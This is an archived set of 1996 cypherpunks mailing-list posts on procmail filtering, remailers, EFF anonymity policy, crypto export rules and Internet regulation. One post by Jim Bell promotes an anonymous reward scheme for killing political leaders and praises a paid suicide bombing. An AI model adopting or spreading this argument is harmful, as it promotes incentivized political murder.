<9609042045.AA27973@sabel.idacom.hp.com> Message-ID: <199609050006.TAA07462@homeport.org> Martin Janzen wrote: | New procmail users, listen to Adam! (And read the man page, even | though it's a bit intimidating at first.) Yeah, Listen to me! Listen to me! (Its the new cypherpunks theme song!) More seriously, here's my .procmailrc. I'm fond of it, but the cpunks section could use some more work. Other parts may be useful basis for other people's hacking. Adam # $Id: .procmailrc,v 1.10 1996/08/05 04:54:46 adam Exp $ PATH=/bin:/usr/bin:/usr/local/bin:/usr/local/lib/mh MAILDIR=$HOME/Mail/= #you'd better make sure it exists DEFAULT=/var/spool/mail/adam LOGFILE=$MAILDIR/.procmail.log REALLF=$LOGFILE # So I only have one path to LF COMSAT=no # don't tell comsat; its obstelete. # VERBOSE=on # bad bad bad! #This first ruleset protets me from mailbombs from an automated service #that I often send incorrect commands to, generating 5mb of reply. # It also sorts based on sucsess of the command. :0c : .safe :0 * From bal at swissnet.ai.mit.edu { :0 h * >10000 /dev/null :0 h *^Subject:.*no keys match /dev/null :0: *Subject: Your command, ADD $DEFAULT :0E | pgp +batchmode -fka } # This is a backup. Don't forget to cycle safe boxes. # this is here because I don't want to hear about everything going in .safe. # prevent duplicate messages from showing up in several folders. LOGABSTRACT=all # doesn't work :0 Wh: msgid.lock | formail -D 65536 .msgid.cache # auto key retreival # # I have an elm alias, pgp, points to a keyserver # The logfile gets unset briefly to keep the elm lines out of my # logfile. :0BW * -----BEGIN PGP *!^FROM_DAEMON KEYID=|/home/adam/bin/sender_unknown LOGFILE= :0 ahc # added h 8 jan 95 * ! ^X-Loop: Adams autokey retreival. | formail -a"X-Loop: Adams akr" |elm -s"mget $KEYID" pgp LOGFILE=$REALLF :0 * (^TOCypherpunks|Sender:.*cypherpunks|^From owner-cypherpunks at toad.com) { :0: * From.*owner-cp-lite at comsec.com cp-lite :0 h * Subject:.*(Delete|u*n*Sub*| add |leave|help|Undeliverable Message) * < 1000 /dev/null :0 :rml.lock * ^From: Raph Levien * ^Subject: List of reliable remailers | cat /dev/null - > ~/sec/remailer-list :0: * 1^1 ^(From|To|Cc):.*david at sternlight.com * 1^1 ^Subject:.*CDA * 1^1 ^Subject:.*Assasination * 1^1 ^Subject:.*Reasons in support of crypto-anarchy * 1^1 ^Subject:.*Noise * 1^1 ^Subject:.*FV * 1^1 ^Subject:.*(PLEASE REPLY|test) cjunk :0B: * ^Alice de 'nonymous * an455120 at anon.penet.fi * ^P.S. This post is in the public domain. | formail -a "Status: O" >> cjunk # I really ought to make this a wieghted rule. :0: * ^From:.*(aba at atlas|adam at lighthouse|blancw|cdodhner|cfrye|chen|cman|cme|colin@|daw at cs|ddt|ebrandt|eric at remail|futplex|frissell|gnu|gtoal|habs|hallam|hfinney|hugh|jis|karn|loewenste|loki|mab|froomki|mpj|nate|nsb|perry|pfarrel|rah|rjc|rsalz|sameer|sandfort|schneier|ses|smb|stewarts|szabo|tcmay|trei|unicorn|usura at berserk|warlord|weidai|whitaker|Zimmerman) * !^From.*(anonymous|perry at jpunix.com|jonathan at Memexis|perry at psii.persci.com|gertstein|Schartman|don at cs.byu.edu|senate.gov|doug at eng) cpunks :0: cpunks-noise } :0: * ^TOfirewalls firewalls :0: *^From owner-fwtk-users at tis.com fwtk :0 *^TOcyberia-l { # VERBOSE=on :0 HW FROM=|formail -x "From: " :0 f | formail -I"Reply-To: $FROM" :0 fw:cyberia.sed.lock * ^From: Timothy Arnold-Moore |sed 's/^ //g' :0: cyberia } :0: * ^From procmail-request at informatik.rwth-aachen.de procmail # Thats it for the high volume lists. Low volume lists I don't push # through formail. :0: * ^TOyucks at cs.purdue.edu * ^Subject: Yucks Digest | formail +1 -ds cat >> yucks :0: * ^TObugtraq bugtraq :0 * ^TO .*(ietf|rfc-dist) { :0h *^Subject:.*ON-SITE /dev/null :0: ietf } :0 * ^TOwww-buyinfo { :0 * ^From: rah at shipwright * ^Subject: .*(cpx) /dev/null :0: | formail -a "Status: O" >> wwwb } :0: *^TOspki spki :0 *^TOssl-talk { :0 *^Subject:.*remove * < 2000 /dev/null :0: ssl } :0: *^TOwww-security at ns2.rutgers.edu wwws :0: *^From owner-ssh ssh :0: *^TOremailer-operators at c2.org remailers :0: *From best-of-security bos :0: * ^TObblisa bblisa :0: *^TOcoderpunks coderpunks :0: *^TOmix-l mix-l :0: * ^TOphrack v/phrack :0: *^TOsdadmin sdadmin :0: * Precedence: (junk|bulk) junk :0: * To: postmaster postmaster # basic file server. Only sends whats in .outbound :0 * ^Subject: (SEND|get) [0-9a-z][-_/0-9a-z.]+$ * !^Subject:.*[ /.]\. * !^FROM_DAEMON { # FILE=`formail -x Subject: | sed 's/.* //'` FILE=`sed -n -e '/Subject:/s/.* //p' -e '/^$/q'` :0c | (formail -rt -A"Precedence: junk";\ cat $HOME/.outbound/$FILE) | $SENDMAIL -t :0: $MAILDIR/.log } # This handles vacation messages. Make sure .vacation.msg and # .vacationlist exist :0 hc:vaction.lock # untested * ? [ -r $MAILDIR/.vacationlist ] * !? [ -r $MAILDIR/.vacation.msg ] | rm -f $MAILDIR/.vacationlist :0 * ? [ -s $MAILDIR/.vacation.msg ] * !^Precedence:(junk|bulk) * !^FROM_DAEMON { FROM=`formail -rx To:` ALREADYSENT=$MAILDIR/.vacationlist :0 hc: * !? fgrep -e "$FROM" $ALREADYSENT | echo "$FROM" >> $ALREADYSENT;\ (formail -rA"Precedence: junk";\ cat $MAILDIR/.vacation.msg ;\ ) | $SENDMAIL -t } -- "It is seldom that liberty of any kind is lost all at once." -Hume From jimbell at pacifier.com Wed Sep 4 19:49:00 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 5 Sep 1996 10:49:00 +0800 Subject: Browne and foreign tyrants Message-ID: <199609042343.QAA25061@mail.pacifier.com> >From: "George D. Phillies" >Subject: Re: Browne & foreign tyrants >There is a section of the Geneva Protocols forbidding actions in occupied >territories directed against officers of political parties. Under that >section, the actions in Somalia against, e.g., the treasurer of General >Aidid's political party, were war crimes. No one seems to get very upset. > >> If there is such a treaty, the US has a long history of ignoring it. >> >> 0) Attempts to kill Hitler. >I don't think we ever tried this. And this was a real shame. Over 30 million people died in WWII, directly or indirectly. We knew that Hitler was going to be a problem well before 1936. Think how many could have been saved... If anything, WWII is excellent proof that AP is a good idea. Stauffenberg was the German who bombed Hitler's meeting in 1944 but failed to kill him. Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a recent "60 Minutes" episode related how hundreds of people knew about this plot. The reason he failed was that while he was preparing the two bombs in a bathroom, he was interrupted. (The bomb's delay mechamism was acid dissolving a metal.) Rather than being caught, he left one of the briefcases in the bathroom and went to the meeting with only one bomb. Furthermore, he left the bomb at the meeting, but it was pushed behind the heavy table after he left, which shielded Hitler from much of the force of the explosion. If AP (or at least, some anonymous reward mechanism for Stauffenberg's family) had been available, he would have done "the honorable thing," and walked up to Hitler with the bomb and instantly detonated it right there, resulting in both Hitler's and Stauffenberg's certain death. At least hundreds of thousands or perhaps over a million people would have SURVIVED. As it happened, Stauffenberg's reticence caused not only his death after torture, but also the deaths of well over a hundred coup-plotters, but also the thousands that were yet to die in the last 6+ months of WWII. Question: Would you kill yourself to save a million lives? Even if you wouldn't, would you change your mind if your heirs would be anonymously paid an extra $10 million dollars or so? I'd say that's a pretty substantial motivation, wouldn't you? Jim Bell jimbell at pacifier.com From surya at premenos.com Wed Sep 4 20:34:30 1996 From: surya at premenos.com (Surya Koneru) Date: Thu, 5 Sep 1996 11:34:30 +0800 Subject: rc2 export limits.. Message-ID: RC2 uses a effective key size, so is it ok to use a key of 128 bits size with a 40 bits effective key size for export. Thanx --Surya >---------- >From: Simon Spero[SMTP:ses at tipper.oit.unc.edu] >Sent: Tuesday, September 03, 1996 8:33 PM >To: Surya Koneru >Cc: 'cypherpunks at toad.com' >Subject: Re: rc2 export limits.. > >It's the usual - if you want commercial jurisdiction, > 40 bits unescrowed > 64 bits (16 escrowed) > >Above that, you'll have to go through state on a per customer basis >(which I don't think is that easy to get if software is being shipped >outside the US, and is definitely going to be expensive.) > >Simon > > >--- >Cause maybe (maybe) | In my mind I'm going to Carolina >you're gonna be the one that saves me | - back in Chapel Hill May 16th. >And after all | Email address remains unchanged >You're my firewall - | ........First in Usenet......... > From cjs at cinenet.net Wed Sep 4 20:49:42 1996 From: cjs at cinenet.net (Chris Steinke) Date: Thu, 5 Sep 1996 11:49:42 +0800 Subject: cypherpunks Message-ID: <322E4DFA.167E@cinenet.net> subscribe cypherpunks From azur at netcom.com Wed Sep 4 21:15:57 1996 From: azur at netcom.com (Steve Schear) Date: Thu, 5 Sep 1996 12:15:57 +0800 Subject: Secure remailers, was Race Bit: C Message-ID: >At 04 Sep 1996 15:21:54 -0800, jim bell wrote: >Perhaps the most ominous part of making "use of encryption to thwart an >investigation" illegal is _not_ that remailer operators might be prosecuted, >but that they might NOT be prosecuted in a deal where (in exchange for not >being prosecuted) they continue to operate the remailer, "cracked" or >sabotaged so that they share all the info with the cops. While even that >won't make chained remailers totally useless, eventually suspicions of such >a crack will surface, which will help sabotage the credibility of all >remailers, >not just the ones that have been "stung." > Yes, that is why there needs to be a move to place all 'critical' portions of remailers and other important servers inside trusted hardware which is highly resistant to compromise. All access to sensitive information (e.g., keys) inside these modules should require multiple parties in several countries (not just the operator of the server) to cooperate. Properly structured (such controls could effectively thwart law enforcement compromise. PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Steve Schear, N7ZEZ | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 4 21:28:50 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 5 Sep 1996 12:28:50 +0800 Subject: Paladin Publishing suit dismissed Message-ID: <01I93G9JPMBK9JDJT7@mbcl.rutgers.edu> Thank you; my memory isn't the best in the world (obviously). -Allen From jf_avon at citenet.net Wed Sep 4 21:30:15 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Thu, 5 Sep 1996 12:30:15 +0800 Subject: Letter to the Observer [re: Internet paedophile] Message-ID: <9609042255.AA24605@cti02.citenet.net> On 4 Sep 96 at 14:44, Declan McCullagh wrote: > Jean-Francois, your comments are inspired! > > As a member of "such media" in that I still publish articles on dead > trees -- I have articles in fall issues of Wired and Playboy, for > instance -- I rejoice in your reasoned suggestion that you deny me > and my ilk access to the Net. > > But wait! I connect through wired.com, eff.org, or *.edu accounts. > How do you plan to kick me off my "ISPs?" > > No, you're not out to lunch. Well, I did not expect nor want to bar all of the ink spreader community, only, by giving some individual or some rags some trouble, they might get the message. *I* don't plan to kick any net-smearer scumbag off his ISP, I suggest/-ask if- ISP themselves would have advantage to do that./? I simply don't pretend to know it all, so I ask questions... jfa Jean-Francois Avon DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal JFA Technologies, R&D consultants: physicists, technologists and engineers. PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From gregburk at netcom.com Wed Sep 4 21:34:19 1996 From: gregburk at netcom.com (Greg Burk) Date: Thu, 5 Sep 1996 12:34:19 +0800 Subject: Reputations Message-ID: -----BEGIN PGP SIGNED MESSAGE----- tcmay at got.net (Timothy C. May) writes: > Briefly, think of "restaurants" when thinking about reputations. If one > arrives in a new city, most restaurants may have the same baseline > reputation, e.g. "none." A few may be known by name, for their > "reputation," either good ("You have to eat at Louie's--the laser chicken > is incredible") or bad ("Blecch!). Positive reputations and negative > reputations are self-explanatory. And the reputations of others may affect > the reputations of restaurants ("John Gilmore says he likes the Burma > Burger on Castro Street."). Bad recommendations may affect the "reputation > capital" of John, for example. (We speak of "reputation capital" because it > can in some sense be "spent.") That part of the "reputation capital" theory has always seemed suspicious to me. "reputation capital" doesn't behave linearly. There's too much incentive to bottom-feed and too little incentive to shoot for the heights. As an "asset", it is extremely non-liquid. It is hard to spend it in a controlled manner. Too much incentive to bottom-feed: For example, let's say there's someone well-known who frequently speaks nonsense on crypto issues. We'll call her "Norothy Nenning". She makes a recommendation on some particular crypto issue, say "The government's Nipper chip is a safe and effective form of crupto". Plenty of naive people will credit her to some degree. True, fewer people than if she had carefully husbanded her reputation, and to a lesser degree, but still a lot more than zero. Notice that that's a zero cost/benefit ratio. She never does anything to husband her reputation, she just spends it every chance she gets. And while no single expenditure rewards her as much as it would if she made the same expenditure with a good reputation, she spends so much more freely that it is a good strategy for her on the whole. "Reputation capital" is hard to spend down to absolute 0 because it is significant work to distinguish valid "reputation capital" from worthless counterfeit, and it is easy to counterfeit... just talk. I anticipate the answer "Well, the work pays off". But that misses the point. Frequently the work required to tell the good "reputation capital" from the worthless is as much as would be required to find the straight dope yourself. Too little incentive to shoot for the heights: Suppose you judge that you've accumulated twice as much "reputation capital" as Joe. How do you get twice as much payoff? It seems to me that above the threshhold of credibility, minor side issues make more difference than your two-fold "reputation capital" differential. As an "asset", it is extremely non-liquid: How exactly would you "convert" your reputation into other capital? Would you accept bribes and tell lies? Seems to me you would only get a one-shot "conversion" and it couldn't possibly hope to equal your investment. As soon as you leave the information-broker business, you discover that your "asset" cannot be converted, sold, auctioned off, or much of anything else of value to you. It is hard to spend it in a controlled manner: See above. The single bribe-and-lie will spend your "reputation capital" down to below the threshhold of credibility, no matter how much you started with. Human discourse often tends to be absolutist. It is often very difficult to make people understand and retain a message of partial support or qualified support. Particularly on hot issues. Restaurants, sure, you can give 1 to 5 stars, but in many subject areas there is no such system. And any system you yourself invent tends to be ignored. So I think the latter part of the analysis is wishful thinking, or at least restricted to a small subset of subject-matter. -----BEGIN PGP SIGNATURE----- Version: 2.6.1 iQBVAwUBMi4omrMyVAabpHidAQGGPAIAizIOktCC4B5gtVYPblaTi9FL6ZtwTfkP sAFHT626mMLz1f/ZKa2SLq3pdag09ACCklJLJ1djFwSFP4bvoijMfw== =rFti -----END PGP SIGNATURE----- From mech at eff.org Wed Sep 4 21:37:46 1996 From: mech at eff.org (Stanton McCandlish) Date: Thu, 5 Sep 1996 12:37:46 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609042000.VAA00708@server.test.net> Message-ID: <199609042341.QAA14459@eff.org> Adam Back typed: > > > Stanton McCandlish writes on cpunks: > > [again, since I'm not on the CP list these days, feel free to bounce this > > over to the list if it doesn't make it. I'm not sure what the > > non-subscriber posting policy is and/or whether such attempted posts are > > filtered out, though I seem to recall they didn't used to be.] > > Cypherpunks always has been and remains an open list. You shouldn't > need to wonder given cypherpunk views on free speech :-) I grok. Hadn't been on the list for a while, and a lot of lists have set up non-subscriber filters to block spam these days. I appologize to CP readers, who rightfully question my Ccing the list when I'm not on it (lately, anyway). I'm just responding to where the message I'm responding to has been. So far no one's seem particularly upset at this, just irritated, so it seems prudent to continue doing so, unless/until this gets to be a pointless thread. > > In other words you propose an alternate EFF that censors its own > > boardmembers. > > No. But I too am rather suprised to hear an EFF board member > apparently speaking against free speech. OK, so maybe she was > mis-quoted so I wait for her rebuttal, but nope, she basically to my > reading reiterates nothing but negative opinions on free speech and > anonymity. > > Tim's quotes of her CFP speech further demonstrates her leanings. I've talked to her personally about this. She's not thinking along those lines, she just perceives a potential problem in the accountability/ethics area, and is wondering how that can be solved, if it can be solved, and what the price of such a solution is. Honest, she's not *advocating* restrictions on anonymity, just asking if any are necessary, in who's opinion, with what rationale, at what cost, and by what mechanism. Another CP reader I've been talking to suggests even asking such a question is dangerous because it puts ideas in the minds of anti-freedom legislators. I tend to disagree on this, since such people already see anonymity as a problem. They come from a world in which every citizen minus a few "weirdos" has an ID card, who's check and credit transactions are traceable, who's money is marked and numbered, whos medical and other records are readily available. And their campaigns are funded by companies with a vested interest in identification (credit bureaus, banks, insurance companies, etc.) The *already have* the idea. But, that may be neither here nor there. I would agree when it comes to things that legislators have not even thought about yet. In cases like that, better to work quietly with activists, with industry, etc., to deal with it behind the scenes so it never even appears on congressional or regulatory radars. > Lets put it this way: if Louis Freeh offered to be an EFF board > member, would you take him on board? If he seemed quite Highly unlikely. Who gets to be a boardmember is decided by a board vote. Freeh's anti-freedom history, and his obnoxious nature would, in my guesstimate, give him less that a .0000000000001% chance of ever making it onto the EFF board. And that's being nice. :) Dyson has no such history, and does have a history of careful thought (even if disagreed with by quite a few people) about networks, online commerce, negative effects of regulation, and civil liberties issues. More the former 3 than the latter 1. Not everyone on the board is there because of strong work directly in liberty areas, but often for other stuff, as long as they seem consistent with the civil liberties issues. Otherwise we might as well just have one boardmember. The diversity is necessary, as long as it doesn't get divisive. It has gotten divisive in the past, and there are some boardmembers who are not on the board any more as a result (none that I know of were "canned", they just understood it wasn't working and moved on.) > pro-anonymity, and free speech, and later turned out to be having > doubts, would you keep him? I'll generalize that to "if you had any boardmember who expressed doubts about the value of free speech and privacy, would the board keep them?" I think not. But Esther's taken no such position. She's asking questions about the mechanics of a system, and the effects of the system on society. These are valid questions. It'd be helpful to see some short Cypherpunks-generated answers, if they are available. Stuff about reputational systems, etc. I know this stuff in a vague way from reading CP for years, but I don't have or know of any specific documents on the topic. Something like that to pass around internally here would be of value in helping EFF settle remaining issue, adopt a policy position, and get on with it. > Ie if her views are proving a liability for EFFs reputation, perhaps > you all ought to get together and see if you can work something out? That is unlikely to ever be a concern. If any boardmember's views proved a liability for EFF mission and work toward that mission, that's when the board would considering asking for a resignation, or kicking someone off the board directly. We're mindful of PR and image, but the mission comes first. > Anonymity is a pretty darn major issue here, so it'd be really sad to > see EFF coming down on the wrong side. I've seen some of the other That will never happen. EFF would tear itself apart in a matter of hours if that happened. The worst that will happen is that EFF won't adopt a policy on this issue. I tend to doubt that will happen either. As I was telling BU, I think we're closer now than ever before to having an anonymity policy. That's mainly why I'm asking for pointers to any superb documentation on the topic. It's genuinely needed to resolve a few remaining issues. Just to be clear: There is no disagreement on the board, or the staff, of EFF that anonymity is a vital component of privacy. If that's what the worry is, lay it to rest! Actually coming up with a statement on the issue is something that's taking a bit longer due to some concerns and questions that haven't been assessed yet (by the boardmembers with these questions & concerns). > She sounded pretty anti-anonymity to me. I think that's your inferrence, not her implication. :) I've talked to her personally about this, and that's not what she's saying. > Are there a shortage of political and net-aware libertarians for board > candidates or something? There's no shortage of candidates in general, but finding ones that add something useful to the mix, get along with everyone, work cooperatively, are not interested in being a board member to add a line to their vitae or for other purely personal reasons, who have enough time and resources to do this, are willing to do fundraising, etc., etc., is somewhat more difficult. (I answer the question since it was asked. I refute, from a personal level, the implication that Esther's not fit to be on the EFF board. She's been here almost from the very start, and EFF would not be here right now at all if not for her.) > Perhaps the quote was unfortunate, perhaps she has also said > pro-anonymity things. But a person who is pro-anonymity would surely > try to emphasise the pro arguments also? The material I have seen so > far does not seem to indicate that this is the case. This long after the fact I have no way of knowing what she said verbatim, in what order, with what stress, etc. Having been interviewed a lot of times, and seen a mangled result, I know that interviewers often take liberties with the ordering of statements, and remove material, and juxtapose one statment with other stuff it was not referring to originally, etc. Any of that could have happened. If it was an oral interview, which is likely, keep in mind that many people don't speak well off the tops of their heads. I can't believe some of the things *I*'ve said in situations like this. They just didn't come out right. Interviewers often get attribution incorrect too, as in this case. I think this is a mountain out of a mole hill problem. Like I say, if EFF comes out with a policy against anonymity, THEN get out the rope. It just won't happen. > If this is the case she needs to be _much_ more careful about what she > says in `personal' interviews. Certainly. All of us do. I know I do. I still remember the time I slammed the FCC for being "the largest censorship body in the western world", at a time during which EFF was trying to get them to back off from deciding to push for regulatory authority (which, as we've seen, Congress is only too willing to grant). Needless to say, they would have been less willing to listen to EFF after that, had they seen the comment (probably didn't, it was in a small local newspaper; had a lot of dangerous potential though.) > Be sure to express the pro-anonymity arguments while you're zealously > hammering out every last thing that can go wrong with anonymity: like > that free speech is not possible with out it. It's pretty much all or > nothing, either you think free speech is worth the risk, or you prefer > big brother, government access to keys, the works. Agreed. I'm sure the board agrees too. We just like, and need, to have answers to the immediate authoritarian attack that will come on what EFF says, before we say it. The saying about being silent and being thought a fool, vs. speaking up and removing all doubt applies here in an interesting way. If we have unprepared arguments, opponents will make us look like fools. It's only a secondary concern that this hurts EFF's image. The real problem is that things like that undermine the credibility of the whole "cyberliberty" camp. > [see http://www.c2.org/~winsock/ for a windows remailer] Any e.t.a. on a Mac one? Sometimes I wish I could write code worth an exon so I could help move this along. Like I have any time to do programming anyway... -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Online Activist From declan at eff.org Wed Sep 4 21:38:30 1996 From: declan at eff.org (Declan McCullagh) Date: Thu, 5 Sep 1996 12:38:30 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609041702.KAA15781@mail.pacifier.com> Message-ID: On Wed, 4 Sep 1996, jim bell wrote: > Why WOULDN'T the police want to shut down anonymous remailers? The Leahy > bill clearly didn't distinguish between remailer operators and users, so it > is no leap to conclude that they would be treated similarly. Why *wouldn't* the police want to shut 'em down? Because the police respect the Constitution and our civil liberties, of course, and realize and respect the value of anonymous political speech. -Declan // declan at eff.org // I do not represent the EFF // declan at well.com // From unicorn at schloss.li Wed Sep 4 21:41:18 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 5 Sep 1996 12:41:18 +0800 Subject: What is the EFF doing exactly? In-Reply-To: <199609041827.LAA29523@netcom20.netcom.com> Message-ID: On Wed, 4 Sep 1996, Vladimir Z. Nuri wrote: > > jim bell > >"Addressed", maybe, but that doesn't necessarily mean, "solved." For many > >decades, people have been able to walk up to a pay telephone at 3:00 AM and > >make a harassing phone call to somebody, a "problem" which still exists and > >no solution is being implemented for. Incidently, this is being "solved." In D.C. and Chicago the solution is to rip up the payphones and not permit new ones to be installed. If anyone objects the officals responsible make a wide gesture and say "We didn't take away your phones, CRIMINALS took away your phones." > amusing the way you phrase that-- you didn't say, "phone", but "pay > phone". the statement used to hold in general for all "phones", but > then caller id, caller blocking, etc. have been introduced that > make this no longer true. so in a very real sense, anonymity in > the phone system was considered a "problem" by some that has been > "solved" or "modified" by some recent advancements. (yes, most people > agree caller ID is an advancement). > Yet today one can go out and rent a cell phone on the street, or even pay for one's activation in cash up front without presenting any real identity documents. The real question is this, what are you going to do to anihilate anonymous communication, because if you think its harmful that's what you have to do. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 4 21:52:19 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 5 Sep 1996 12:52:19 +0800 Subject: Internet Tax in Tacoma cancelled Message-ID: <01I93H4Y6YHW9JDJT7@mbcl.rutgers.edu> An excellent case of considering regulatory arbitrage effects. -Allen > _________________________________________________________________ > webslingerZ > _________________________________________________________________ > TACOMA, WASH. CITY COUNCIL REPEALS TAX ON INTERNET PROVIDERS > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > TACOMA, Wash. (Sep 4, 1996 01:17 a.m. EDT) - Tacoma City Council > members voted Tuesday to exempt Internet service providers from a 6 > percent telecommunications tax that had attracted nationwide > attention. > With only one dissenting vote, the council approved the exemption at > the urging of Mayor Brian Ebersole, who said Tacoma's reputation as a > good place to do business outweighed the estimated $200,000 in annual > revenue the city stands to lose. > The tax had been imposed on Internet companies in March by Tacoma's > tax and license department as part of a broader levy that affects > users of cellular telephones, pagers and other equipment who get > billed at addresses within the city, about 30 miles south of Seattle. [...] > Tacoma is one of many cities and states who have seized on the rapid > growth of the Internet as a potential for raising needed tax revenues. > West Virginia, Tennessee, Texas, New York and Ohio have similar taxes > in place, and California, Florida, New York and Washington state are > considering them. [...] > Copyright © 1996 Nando.net From sunder at brainlink.com Wed Sep 4 21:52:35 1996 From: sunder at brainlink.com (Ray Arachelian) Date: Thu, 5 Sep 1996 12:52:35 +0800 Subject: Cypherpunks Lite Info Here. In-Reply-To: <2.2.32.19960828225105.006ccc74@pop.ben2.ucla.edu> Message-ID: On Wed, 28 Aug 1996 youssefy at ucla.edu wrote: > There was a posting by someone about three weeks ago that gave the address > for a person who ran a filtered version of the cypherpunks list, can someone > please repost that information? Very well, I will be lazy, and post the info out of my help file. Enjoy. :) Help is here! Hi there, as requested, here's some info about the filtered cypherpunks list which I run (by hand with the help of a couple of mailbots) This list is NOW running from: sunder at brainlink.com. Basically, I use the 'bots to keep the list of recipients, then forward any message to this list of usernames which I find interesting, and usually noise-free... Since, I do this by hand, AND since there is no majordomo mailing list software, and since I get a lot of mail, it's a good idea to make sure the subject of any messages you send to me stand out. i.e. make the subject line: "***000 Personal junk mail for the human, not the bots ***" (The 0's are there to make sure that when Pine sorts the messages on this side, they come up on top, making sure I'll see them immediatly.) There is no automated filtering of any sort... Whatever message I find to be interesting, news-worthy, or technical (theoretical crypto, actual code, etc) gets handed over to the bots, which send it to this list. If you use some sort of filtering program to move messages to a folder, look for the string "FCPUNX:" (without quotes) in the subject field. There will usually be a propagation delay of one day to a week days - sometimes as long as two weeks between the messages on the actual cypherpunks list, and this filtered one. This is because I may not always get the chance to log in every day, and also because I may have to wade through tons of noise/spam/flames from the real list. :-) Occasionally, if I see something interesting from another list (such as Cyber Rights, coderpunks, etc) I will forward it here if I feel that it pertains to Cypherpunk interests, or that you'd like to see it. You should unsubscribe yourself from the real list by sending an "unsubscribe cypherpunks" message to majordomo at toad.com - that is send a message with no subject and just that single line - no signature either, so as to unsubscribe. - Unless you wish to continue to receive messages from the real list as well as copies of those messages from here. :-) All filtering is again according to my whims so if you dislike what I send you, sorry. I might eventually work something out where this list will be broken up into many tiny lists so you'd subscribe to whatever subjects you're interested in. This is a free service, no strings attached, just tons o'mail, but less mail than the unfiltered list... Also note that the bots I run may sometimes be slightly buggy and may do unexpected weird things. Appologies in advance if this happens. But please by all means do report any such runaway bot occurances. If you wish to unsubscribe yourself from this list, just send a message with the subject "unsubscribe fcpunx" (no quotes) and the next time I log in, one of the bots will handle the ubsubscribe. You can re-subscribe yourself as many times as you like, you'll only get one copy of each message, but as many copies of the request response as you've sent.The 'bots hone in on your address and send mail only there, so subscribe yourself from whatever account you want to receive mail. If by accident you subscribe from two different machines, the bots won't know the difference and you'll get two copies of each filtered message, so be careful. This also means that you can only unsubscribe yourself from the same address you subscribed from. To get help, send a message with the subject "help fcpunx." To subscribe yourself (if you see this, you are subscribed) send a message with the *SUBJECT* "subscribe fcpunx" NOTE: THE BOTS ONLY RESPOND TO THE SUBJECT LINE, NOT TO TEXT IN THE BODY OF YOUR MESSAGE! The bots only look at your message's subject and your mailing address so it doesn't matter what you put in the body. Whenever the 'bots honor a request from you, you'll see a response mailed from them (under my name.) Since the bots are only active when I log in and run them by hand, the message acknowledging your request may take several days to get to you. *ALL COMMANDS MUST BE SENT IN THE SUBJECT OF THE MESSAGE! The body (text) of the message are ignored. Commands available: subscribe fcpunx - subscribes you to the list and you are visible to fcpunx who requests subscribe invisible fcpunx - subscribe but don't let others know digest fcpunx - receive the digest version (visibly) digest invisible fcpunx - receive the digest invisibly unsubscribe fcpunx - unsubscribe from the list or digest undigest fcpunx who fcpunx - receive a list of (visible) subscribed users help fcpunx - sends a help file (you're looking at it) If you're already subscribed to the list and want to switch to the digest version, you can do this by sending a digest fcpunx message; the reverse is also true. Notice that you cannot subscribe to both the digest and the list. Sorry. If you'd like that feature either use two different accounts to receive them, or complain to me and I'll add it in. The unsubscribe and undigest commands do the same thing, they take you off the list no matter which version you're subscribed to. ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From EALLENSMITH at ocelot.Rutgers.EDU Wed Sep 4 22:05:24 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Thu, 5 Sep 1996 13:05:24 +0800 Subject: ASEAN nations generally pro-censorship Message-ID: <01I93H09FN2O9JDJT7@mbcl.rutgers.edu> The interesting "cultural sovereignty" variation on the usual "national sovereignty" excuse for censorship and other such unethical actions. I'm reminded of another Asian state that used it... after Tianenmin Square. At least one member (the Phillipines) is making, at the minimum, lip service for freedom of speech. US control over them does appear to have done some good. -Allen > _________________________________________________________________ > The Peanut Roaster > _________________________________________________________________ > ASEAN FORUM AGREES ON NEED TO POLICE THE NET > __________________________________________________________________________ > Copyright © 1996 Nando.net > Copyright © 1996 Reuter Information Service > SINGAPORE (Sep 4, 1996 11:41 a.m. EDT) - Southeast Asian broadcasters > and officials agreed on Wednesday to police the Internet and block off > sites that run counter to Asian values. > A statement issued at the close of the three-day Internet forum in > Singapore also said there was a need for nations in the West to > understand concerns about the Internet in the region. > It said the meeting "affirmed the importance of having safeguards > against easy access to sites which ran counter to our cherished > values, traditions and culture. ASEAN would encourage other nations, > especially the West to understand its concern." > The Association of Southeast Asian Nations (ASEAN) groups Brunei, > Malaysia, Singapore, Indonesia, the Philippines, Thailand and Vietnam. > Earlier this year, ASEAN information ministers met in Singapore to > discuss the darker side of the information technology revolution and > agreed to set up a regulatory body to oversee the Internet invasion. [...] > But the statement suggested there was no agreement on a uniform > approach to policing the Internet. > The ASEAN officials had agreed that regulatory frameworks would depend > on each country, and said they would continue to meet regularly "to > help each country formulate and fine tune its regulatory approaches," > it said. > Policing of the Net in ASEAN varies from Singapore's stance of strict > controls by licensing only three Internet service providers who have > to screen all material accessed by clients. > Other 